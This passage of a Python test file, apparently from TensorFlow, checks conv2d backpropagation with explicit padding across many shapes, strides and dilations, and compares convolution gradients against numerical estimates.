input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
  def _RunAndVerifyBackpropInputExplicitPadding(self,
                                                input_sizes,
                                                filter_sizes,
                                                output_sizes,
                                                strides,
                                                padding,
                                                data_format,
                                                use_gpu,
                                                dilations=(1, 1),
                                                err=2e-5):
    """Checks explicit-padding backprop-input against a VALID-conv reference.

    Computes the expected gradient by running conv2d_backprop_input with
    VALID padding over an enlarged (pre-padded) input shape, then cropping
    the padded border off the result; the explicitly-padded op must match.

    Args:
      input_sizes: NHWC shape of the (unpadded) forward input.
      filter_sizes: Filter shape [kh, kw, in_depth, out_depth].
      output_sizes: NHWC shape of the forward output.
      strides: [row_stride, col_stride].
      padding: Explicit padding [[top, bottom], [left, right]].
      data_format: "NHWC" or "NCHW".
      use_gpu: Run on GPU; skipped when no CUDA device.
      dilations: [row_dilation, col_dilation]; non-default requires GPU.
      err: Tolerance passed through to the comparison.
    """
    if use_gpu and not test.is_gpu_available(cuda_only=True):
      return
    if not use_gpu and dilations != (1, 1):
      return  # Non-default dilations is currently not supported on the CPU.
    x1 = self._CreateNumpyTensor(filter_sizes)
    x2 = self._CreateNumpyTensor(output_sizes)
    dilations = list(dilations)
    # Reference: grow the input shape by the explicit padding amounts and
    # run a plain VALID backprop-input over it.
    padded_input_sizes = input_sizes[:]
    padded_input_sizes[1] += padding[0][0] + padding[0][1]
    padded_input_sizes[2] += padding[1][0] + padding[1][1]
    c = nn_ops.conv2d_backprop_input(
        padded_input_sizes,
        x1,
        x2,
        strides=[1] + strides + [1],
        padding="VALID",
        dilations=[1] + dilations + [1])
    # Crop the padded border back off: gradients w.r.t. padding cells do not
    # belong to the unpadded input.
    c = c[:, padding[0][0]:(c.shape[1] - padding[0][1]), padding[1][0]:(
        c.shape[2] - padding[1][1]), :]
    expected = list(self.evaluate(array_ops.reshape(c, [-1])))
    self._RunAndVerifyBackpropInput(
        input_sizes,
        filter_sizes,
        output_sizes,
        strides,
        padding,
        expected,
        data_format,
        use_gpu=use_gpu,
        err=err,
        dilations=dilations)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding0x0BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding=[[0, 0], [0, 0]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 4, 2],
filter_sizes=[2, 2, 2, 3],
output_sizes=[1, 1, 2, 3],
strides=[2, 2],
padding=[[0, 0], [0, 0]],
data_format=data_format,
use_gpu=use_gpu)
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding1x1BackpropInput(self):
    """Backprop-input with symmetric 1x1 explicit padding."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[1, 2, 3, 1],
          filter_sizes=[2, 2, 1, 2],
          output_sizes=[1, 3, 4, 2],
          strides=[1, 1],
          padding=[[1, 1], [1, 1]],
          data_format=data_format,
          use_gpu=use_gpu,
          err=1e-4)
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[1, 2, 3, 2],
          filter_sizes=[1, 1, 2, 1],
          output_sizes=[1, 4, 3, 1],
          strides=[1, 2],
          padding=[[1, 1], [1, 1]],
          data_format=data_format,
          use_gpu=use_gpu)
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[1, 4, 3, 1],
          filter_sizes=[2, 2, 1, 1],
          output_sizes=[1, 4, 2, 1],
          strides=[1, 2],
          padding=[[1, 1], [1, 1]],
          data_format=data_format,
          dilations=[2, 2], use_gpu=use_gpu)
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding2x2BackpropInput(self):
    """Backprop-input with symmetric 2x2 explicit padding."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[2, 3, 1, 1],
          filter_sizes=[2, 1, 1, 1],
          output_sizes=[2, 2, 5, 1],
          strides=[3, 1],
          padding=[[2, 2], [2, 2]],
          data_format=data_format,
          use_gpu=use_gpu)
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[1, 3, 6, 1],
          filter_sizes=[3, 2, 1, 1],
          output_sizes=[1, 3, 4, 1],
          strides=[1, 2],
          padding=[[2, 2], [2, 2]],
          data_format=data_format,
          dilations=[2, 3],
          use_gpu=use_gpu)
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding_1_8_4_1_BackpropInput(self):
    """Backprop-input with asymmetric explicit padding [[1, 8], [4, 2]]."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[1, 2, 3, 1],
          filter_sizes=[2, 2, 1, 1],
          output_sizes=[1, 10, 8, 1],
          strides=[1, 1],
          padding=[[1, 8], [4, 2]],
          data_format=data_format,
          use_gpu=use_gpu,
          err=5e-5)
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[1, 5, 3, 1],
          filter_sizes=[3, 2, 1, 1],
          output_sizes=[1, 4, 8, 1],
          strides=[3, 1],
          padding=[[1, 8], [4, 2]],
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding_5_0_2_2_BackpropInput(self):
    """Backprop-input with asymmetric explicit padding [[5, 0], [2, 2]]."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[1, 3, 3, 1],
          filter_sizes=[2, 1, 1, 1],
          output_sizes=[1, 7, 7, 1],
          strides=[1, 1],
          padding=[[5, 0], [2, 2]],
          data_format=data_format,
          err=5e-5,
          use_gpu=use_gpu)
      self._RunAndVerifyBackpropInputExplicitPadding(
          input_sizes=[1, 4, 2, 1],
          filter_sizes=[3, 3, 1, 1],
          output_sizes=[1, 5, 2, 1],
          strides=[1, 2],
          padding=[[5, 0], [2, 2]],
          data_format=data_format,
          dilations=[2, 1],
          use_gpu=use_gpu)
  def _RunAndVerifyBackpropFilterExplicitPadding(self,
                                                 input_sizes,
                                                 filter_sizes,
                                                 output_sizes,
                                                 strides,
                                                 padding,
                                                 data_format,
                                                 use_gpu,
                                                 dilations=(1, 1),
                                                 err=1e-5):
    """Checks explicit-padding conv2d_backprop_filter against a VALID reference.

    The expected gradient is computed by zero-padding the input with np.pad
    and running conv2d_backprop_filter with "VALID" padding; the filter
    gradient needs no cropping since the filter shape is unchanged.

    Args:
      input_sizes: Input dimensions [batch, rows, cols, depth].
      filter_sizes: Filter dimensions [rows, cols, in_depth, out_depth].
      output_sizes: Output dimensions [batch, rows, cols, depth].
      strides: Spatial strides [stride_rows, stride_cols].
      padding: Explicit spatial padding [[top, bottom], [left, right]].
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to run on GPU.
      dilations: Spatial dilations (rows, cols).
      err: Maximum allowed elementwise error.
    """
    if use_gpu and not test.is_gpu_available(cuda_only=True):
      return
    if not use_gpu and dilations != (1, 1):
      return  # Non-default dilations is currently not supported on the CPU.
    x0 = self._CreateNumpyTensor(input_sizes)
    x2 = self._CreateNumpyTensor(output_sizes)
    dilations = list(dilations)
    # Zero-pad only the spatial dims; batch and depth stay untouched.
    x0 = np.pad(x0, [(0, 0)] + padding + [(0, 0)], "constant")
    c = nn_ops.conv2d_backprop_filter(
        x0,
        filter_sizes,
        x2,
        strides=[1] + strides + [1],
        padding="VALID",
        dilations=[1] + dilations + [1])
    expected = list(self.evaluate(array_ops.reshape(c, [-1])))
    self._RunAndVerifyBackpropFilter(
        input_sizes,
        filter_sizes,
        output_sizes,
        strides,
        padding,
        expected,
        data_format,
        use_gpu=use_gpu,
        dilations=dilations,
        err=err)
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding0x0BackpropFilter(self):
    """Backprop-filter with explicit zero padding (equivalent to VALID)."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 2, 3, 1],
          filter_sizes=[2, 2, 1, 1],
          output_sizes=[1, 1, 2, 1],
          strides=[1, 1],
          padding=[[0, 0], [0, 0]],
          data_format=data_format, use_gpu=use_gpu)
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 3, 4, 2],
          filter_sizes=[2, 2, 2, 3],
          output_sizes=[1, 1, 2, 3],
          strides=[2, 2],
          padding=[[0, 0], [0, 0]],
          data_format=data_format, use_gpu=use_gpu)
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding1x1BackpropFilter(self):
    """Backprop-filter with symmetric 1x1 explicit padding."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 2, 3, 1],
          filter_sizes=[2, 2, 1, 2],
          output_sizes=[1, 3, 4, 2],
          strides=[1, 1],
          padding=[[1, 1], [1, 1]],
          data_format=data_format,
          use_gpu=use_gpu,
          err=5e-5)
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 2, 3, 2],
          filter_sizes=[1, 1, 2, 1],
          output_sizes=[1, 4, 3, 1],
          strides=[1, 2],
          padding=[[1, 1], [1, 1]],
          use_gpu=use_gpu,
          data_format=data_format)
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 4, 3, 1],
          filter_sizes=[2, 2, 1, 1],
          output_sizes=[1, 4, 2, 1],
          strides=[1, 2],
          padding=[[1, 1], [1, 1]],
          data_format=data_format,
          use_gpu=use_gpu,
          dilations=[2, 2])
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding2x2BackpropFilter(self):
    """Backprop-filter with symmetric 2x2 explicit padding."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[2, 3, 1, 1],
          filter_sizes=[2, 1, 1, 1],
          output_sizes=[2, 2, 5, 1],
          strides=[3, 1],
          padding=[[2, 2], [2, 2]],
          data_format=data_format,
          use_gpu=use_gpu)
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 3, 6, 1],
          filter_sizes=[3, 2, 1, 1],
          output_sizes=[1, 3, 4, 1],
          strides=[1, 2],
          padding=[[2, 2], [2, 2]],
          data_format=data_format,
          use_gpu=use_gpu,
          dilations=[2, 3])
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding_1_8_4_1_BackpropFilter(self):
    """Backprop-filter with asymmetric explicit padding [[1, 8], [4, 2]]."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 2, 3, 1],
          filter_sizes=[2, 2, 1, 1],
          output_sizes=[1, 10, 8, 1],
          strides=[1, 1],
          padding=[[1, 8], [4, 2]],
          data_format=data_format,
          use_gpu=use_gpu,
          err=1e-4)
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 5, 3, 1],
          filter_sizes=[3, 2, 1, 1],
          output_sizes=[1, 4, 8, 1],
          strides=[3, 1],
          padding=[[1, 8], [4, 2]],
          use_gpu=use_gpu,
          data_format=data_format)
  @test_util.run_in_graph_and_eager_modes()
  def testConv2D2x2Depth1Padding_5_0_2_2_BackpropFilter(self):
    """Backprop-filter with asymmetric explicit padding [[5, 0], [2, 2]]."""
    for (data_format, use_gpu) in GetTestConfigs():
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 3, 3, 1],
          filter_sizes=[2, 1, 1, 1],
          output_sizes=[1, 7, 7, 1],
          strides=[1, 1],
          padding=[[5, 0], [2, 2]],
          data_format=data_format,
          use_gpu=use_gpu,
          err=1e-4)
      self._RunAndVerifyBackpropFilterExplicitPadding(
          input_sizes=[1, 4, 2, 1],
          filter_sizes=[3, 3, 1, 1],
          output_sizes=[1, 5, 2, 1],
          strides=[1, 2],
          padding=[[5, 0], [2, 2]],
          data_format=data_format,
          use_gpu=use_gpu,
          dilations=[2, 1])
  # Gradient checkers
  def ConstructAndTestGradient(self,
                               batch,
                               input_rows,
                               input_cols,
                               filter_rows,
                               filter_cols,
                               in_depth,
                               out_depth,
                               stride_rows,
                               stride_cols,
                               padding,
                               test_input,
                               data_format,
                               use_gpu,
                               num_groups=1,
                               max_err=0.003):
    """Checks conv2d input or filter gradients against numeric differentiation.

    Builds a conv2d over deterministic ramp data and compares the theoretical
    Jacobian with a numerically computed one (float32), or with the float32
    theoretical Jacobian (lower-precision dtypes).

    Args:
      batch: Batch size.
      input_rows: Input height.
      input_cols: Input width.
      filter_rows: Filter height.
      filter_cols: Filter width.
      in_depth: Input channel count.
      out_depth: Output channel count.
      stride_rows: Row stride.
      stride_cols: Column stride.
      padding: "VALID", "SAME", or an explicit NHWC padding list.
      test_input: If True, check the input gradient; else the filter gradient.
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to run on GPU.
      num_groups: Number of convolution groups; must divide both depths.
      max_err: Maximum allowed gradient error.
    """
    assert in_depth % num_groups == 0 and out_depth % num_groups == 0
    input_shape = [batch, input_rows, input_cols, in_depth]
    filter_shape = [filter_rows, filter_cols, in_depth // num_groups, out_depth]
    # TODO(yangke): re-factor the computation of output shape.
    if padding == "VALID":
      output_rows = (input_rows - filter_rows + stride_rows) // stride_rows
      output_cols = (input_cols - filter_cols + stride_cols) // stride_cols
    elif padding == "SAME":
      output_rows = (input_rows + stride_rows - 1) // stride_rows
      output_cols = (input_cols + stride_cols - 1) // stride_cols
    else:
      # Explicit padding is given in NHWC order: indices 1 and 2 are the
      # spatial (row, col) padding pairs.
      self.assertIsInstance(padding, (list, tuple))
      output_rows = (input_rows + padding[1][0] + padding[1][1] - filter_rows +
                     stride_rows) // stride_rows
      output_cols = (input_cols + padding[2][0] + padding[2][1] - filter_cols +
                     stride_cols) // stride_cols
    output_shape = [batch, output_rows, output_cols, out_depth]
    input_size = 1
    for x in input_shape:
      input_size *= x
    filter_size = 1
    for x in filter_shape:
      filter_size *= x
    # Deterministic ramp data in [0, 1) so runs are reproducible.
    input_data = [x * 1.0 / input_size for x in range(0, input_size)]
    filter_data = [x * 1.0 / filter_size for x in range(0, filter_size)]
    # Conv2DGrad functions are not compiled for double due to
    # a problem in the way Eigen's Conv2DGrad works for double.
    # So we disable the DOUBLE path. We should re-enable this
    # when double support returns for CPU and/or GPU.
    for dtype in self._DtypesToTest(use_gpu=use_gpu):
      with self.cached_session(use_gpu=use_gpu):
        input_tensor = constant_op.constant(
            input_data, shape=input_shape, dtype=dtype, name="input")
        filter_tensor = constant_op.constant(
            filter_data, shape=filter_shape, dtype=dtype, name="filter")
        strides = [1, stride_rows, stride_cols, 1]
        new_padding = padding
        if data_format == "NCHW":
          new_input_tensor = test_util.NHWCToNCHW(input_tensor)
          strides = test_util.NHWCToNCHW(strides)
          if isinstance(padding, (list, tuple)):
            new_padding = test_util.NHWCToNCHW(padding)
        else:
          new_input_tensor = input_tensor
        conv = nn_ops.conv2d(
            new_input_tensor,
            filter_tensor,
            strides,
            new_padding,
            data_format=data_format,
            name="conv")
        if data_format == "NCHW":
          conv = test_util.NCHWToNHWC(conv)
        self.assertEqual(output_shape, conv.get_shape())
        if test_input:
          jacob_t, jacob_n = gradient_checker.compute_gradient(input_tensor,
                                                               input_shape,
                                                               conv,
                                                               output_shape)
        else:
          jacob_t, jacob_n = gradient_checker.compute_gradient(filter_tensor,
                                                               filter_shape,
                                                               conv,
                                                               output_shape)
        if dtype == dtypes.float32:
          reference_jacob_t = jacob_t
          err = np.fabs(jacob_t - jacob_n).max()
        else:
          # Compare fp16 theoretical gradients to fp32 theoretical gradients,
          # since fp16 numerical gradients are too imprecise.
          # NOTE(review): assumes _DtypesToTest yields float32 before any
          # lower-precision dtype so reference_jacob_t is bound -- TODO confirm.
          err = np.fabs(jacob_t - reference_jacob_t).max()
        tf_logging.debug("conv_2d gradient error = %s", err)
        self.assertLess(err, max_err)
  @test_util.deprecated_graph_mode_only
  def testInputGradientValidPaddingStrideOne(self):
    """Input gradient, VALID padding, stride 1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=5,
          input_cols=4,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding="VALID",
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradientValidPaddingStrideOne(self):
    """Filter gradient, VALID padding, stride 1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=4,
          input_rows=6,
          input_cols=5,
          filter_rows=2,
          filter_cols=2,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding="VALID",
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradientValidPaddingStrideTwo(self):
    """Input gradient, VALID padding, stride 2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=4,
          input_cols=5,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=2,
          stride_cols=2,
          padding="VALID",
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradientValidPaddingStrideTwo(self):
    """Filter gradient, VALID padding, stride 2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=4,
          input_rows=6,
          input_cols=5,
          filter_rows=2,
          filter_cols=2,
          in_depth=2,
          out_depth=3,
          stride_rows=2,
          stride_cols=2,
          padding="VALID",
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradientValidPaddingStrideThree(self):
    """Input gradient, VALID padding, stride 3."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=7,
          input_cols=6,
          filter_rows=3,
          filter_cols=3,
          in_depth=4,
          out_depth=5,
          stride_rows=3,
          stride_cols=3,
          padding="VALID",
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradientValidPaddingStrideThree(self):
    """Filter gradient, VALID padding, stride 3."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=8,
          input_cols=7,
          filter_rows=4,
          filter_cols=4,
          in_depth=2,
          out_depth=3,
          stride_rows=3,
          stride_cols=3,
          padding="VALID",
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradientSamePaddingStrideOne(self):
    """Input gradient, SAME padding, stride 1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=7,
          input_cols=6,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding="SAME",
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradientSamePaddingStrideOne(self):
    """Filter gradient, SAME padding, stride 1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=4,
          input_rows=6,
          input_cols=5,
          filter_rows=2,
          filter_cols=2,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding="SAME",
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradientSamePaddingStrideTwo(self):
    """Input gradient, SAME padding, stride 2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=5,
          input_cols=4,
          filter_rows=3,
          filter_cols=3,
          in_depth=3,
          out_depth=3,
          stride_rows=2,
          stride_cols=2,
          padding="SAME",
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradientSamePaddingStrideTwo(self):
    """Filter gradient, SAME padding, stride 2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=4,
          input_rows=6,
          input_cols=5,
          filter_rows=2,
          filter_cols=2,
          in_depth=2,
          out_depth=3,
          stride_rows=2,
          stride_cols=2,
          padding="SAME",
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradientSamePaddingStrideThree(self):
    """Input gradient, SAME padding, stride 3."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=7,
          input_cols=6,
          filter_rows=3,
          filter_cols=3,
          in_depth=4,
          out_depth=5,
          stride_rows=3,
          stride_cols=3,
          padding="SAME",
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradientSamePaddingStrideThree(self):
    """Filter gradient, SAME padding, stride 3."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=8,
          input_cols=7,
          filter_rows=4,
          filter_cols=4,
          in_depth=2,
          out_depth=3,
          stride_rows=3,
          stride_cols=3,
          padding="SAME",
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradientSamePaddingStride2x1(self):
    """Filter gradient, SAME padding, asymmetric stride 2x1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=8,
          input_cols=7,
          filter_rows=4,
          filter_cols=4,
          in_depth=2,
          out_depth=3,
          stride_rows=2,
          stride_cols=1,
          padding="SAME",
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradientKernelSizeMatchesInputSize(self):
    """Input gradient when the kernel exactly covers the input (1x1 output)."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=4,
          input_cols=3,
          filter_rows=4,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding="VALID",
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradientKernelSizeMatchesInputSize(self):
    """Filter gradient when the kernel exactly covers the input (1x1 output)."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=4,
          input_cols=3,
          filter_rows=4,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding="VALID",
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradient1x1PaddingStrideOne(self):
    """Input gradient, explicit 1x1 padding, stride 1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=5,
          input_cols=4,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu,
          max_err=0.0025)
  @test_util.deprecated_graph_mode_only
  def testFilterGradient1x1PaddingStrideOne(self):
    """Filter gradient, explicit 1x1 padding, stride 1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=5,
          input_cols=4,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradient1x1PaddingStrideTwo(self):
    """Input gradient, explicit 1x1 padding, stride 2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=4,
          input_cols=5,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=2,
          stride_cols=2,
          padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradient1x1PaddingStrideTwo(self):
    """Filter gradient, explicit 1x1 padding, stride 2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=4,
          input_cols=5,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=2,
          stride_cols=2,
          padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradient2x2PaddingStrideOne(self):
    """Input gradient, explicit 2x2 padding, stride 1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=5,
          input_cols=4,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding=[[0, 0], [2, 2], [2, 2], [0, 0]],
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu,
          max_err=0.003)
  @test_util.deprecated_graph_mode_only
  def testFilterGradient2x2PaddingStrideOne(self):
    """Filter gradient, explicit 2x2 padding, stride 1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=5,
          input_cols=4,
          filter_rows=3,
          filter_cols=3,
          in_depth=2,
          out_depth=3,
          stride_rows=1,
          stride_cols=1,
          padding=[[0, 0], [2, 2], [2, 2], [0, 0]],
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu,
          max_err=0.003)
  @test_util.deprecated_graph_mode_only
  def testInputGradient1_2_3_4PaddingStride3x2(self):
    """Input gradient, asymmetric explicit padding [1,2]x[3,4], stride 3x2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=8,
          input_cols=5,
          filter_rows=4,
          filter_cols=2,
          in_depth=3,
          out_depth=2,
          stride_rows=3,
          stride_cols=2,
          padding=[[0, 0], [1, 2], [3, 4], [0, 0]],
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradient1_2_3_4PaddingStride3x2(self):
    """Filter gradient, asymmetric explicit padding [1,2]x[3,4], stride 3x2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=8,
          input_cols=5,
          filter_rows=4,
          filter_cols=2,
          in_depth=3,
          out_depth=2,
          stride_rows=3,
          stride_cols=2,
          padding=[[0, 0], [1, 2], [3, 4], [0, 0]],
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradient4_3_2_1PaddingStride2x1(self):
    """Input gradient, asymmetric explicit padding [4,3]x[2,1], stride 2x1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=3,
          input_rows=5,
          input_cols=7,
          filter_rows=3,
          filter_cols=2,
          in_depth=1,
          out_depth=2,
          stride_rows=2,
          stride_cols=1,
          padding=[[0, 0], [4, 3], [2, 1], [0, 0]],
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradient4_3_2_1PaddingStride2x1(self):
    """Filter gradient, asymmetric explicit padding [4,3]x[2,1], stride 2x1."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=3,
          input_rows=5,
          input_cols=7,
          filter_rows=3,
          filter_cols=2,
          in_depth=1,
          out_depth=2,
          stride_rows=2,
          stride_cols=1,
          padding=[[0, 0], [4, 3], [2, 1], [0, 0]],
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testInputGradient0_0_0_5PaddingStride1x2(self):
    """Input gradient, one-sided explicit padding [0,0]x[0,5], stride 1x2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=6,
          input_cols=7,
          filter_rows=3,
          filter_cols=4,
          in_depth=3,
          out_depth=2,
          stride_rows=1,
          stride_cols=2,
          padding=[[0, 0], [0, 0], [0, 5], [0, 0]],
          test_input=True,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testFilterGradient0_0_0_5PaddingStride1x2(self):
    """Filter gradient, one-sided explicit padding [0,0]x[0,5], stride 1x2."""
    for (data_format, use_gpu) in GetTestConfigs():
      self.ConstructAndTestGradient(
          batch=2,
          input_rows=6,
          input_cols=7,
          filter_rows=3,
          filter_cols=4,
          in_depth=3,
          out_depth=2,
          stride_rows=1,
          stride_cols=2,
          padding=[[0, 0], [0, 0], [0, 5], [0, 0]],
          test_input=False,
          data_format=data_format,
          use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testShapeFunctionEdgeCases(self):
    """Verifies conv2d shape inference: unknown shapes, bad ranks/depths, and malformed explicit padding all raise ValueError at graph-build time."""
